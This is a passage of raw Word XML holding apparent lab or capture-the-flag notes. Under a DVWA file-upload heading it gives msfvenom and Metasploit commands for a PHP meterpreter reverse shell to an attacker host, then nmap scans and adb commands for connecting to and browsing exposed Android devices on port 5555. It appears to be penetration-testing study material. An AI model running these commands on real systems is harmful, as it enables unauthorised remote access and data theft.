      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>DVWA:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Commad injection or </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="2265D275" w14:textId="5049CF93">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267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GB"/>
        </w:rPr>
        <w:t>This is a file upload vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="0175B598" w14:textId="1F8E726F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="7548B4AC" w14:textId="5E4C643A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=&lt;attacker-ip&gt; LPORT=&lt;attacker-port&gt; -f raw &gt; file.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="71C4E06C" w14:textId="453ACC32">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>msfdb init &amp;&amp; msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="44B6E8B4" w14:textId="75DF61BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="03CF3B16" w14:textId="675EB90B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set payload php/meterepreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="6702D06A" w14:textId="139217D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set LHOST=attacker-ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="397EBB1C" w14:textId="6FDA56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set LPORT= attcker-port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="4A34CC09" w14:textId="64ECA045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="38C7C267">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="5F9B11DB" w14:textId="6148E915">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="5B4D83BD" w:rsidRDefault="086BDCD4" w14:paraId="796ECEF1" w14:textId="004B2F3F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="438ACD8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3924617A" w:rsidP="5B4D83BD" w:rsidRDefault="3924617A" w14:paraId="522B619D" w14:textId="3A26D3FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3924617A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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From the first </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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scan try to on which IP port 5555 is </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>running.That</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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IP is running </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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android emulator or can verify it by seeing the output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="1A86DF93" w14:textId="1009E2D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> –p 5555 </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/24 or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="424CCCCD" w14:textId="02CD4269">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt; nmap -p 80,443,8080,8443,5228 --open 10.10.55.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="25A87E52" w14:textId="2EF51DAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Using adb Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="2F697A66" w14:textId="61C008AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>adb connect x.x.x.x:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="78C662D0" w14:textId="385D081C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>adb devices -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="5C1419B3" w14:textId="1264517D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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adb shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="31B1432C" w14:textId="0D1349EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="47B2F67E" w14:textId="40998A03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="7B93A25D" w14:textId="41E71916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cd Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="70751403" w14:textId="097C0720">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="257B6067" w14:textId="43259685">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cd sdcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="154E97E6" w14:textId="43EA9DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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Find / -name “Scan Folder” -ls 2&gt; /dev/null or </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="C20CB9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660033"/>
          <w:sz w:val="18"/>
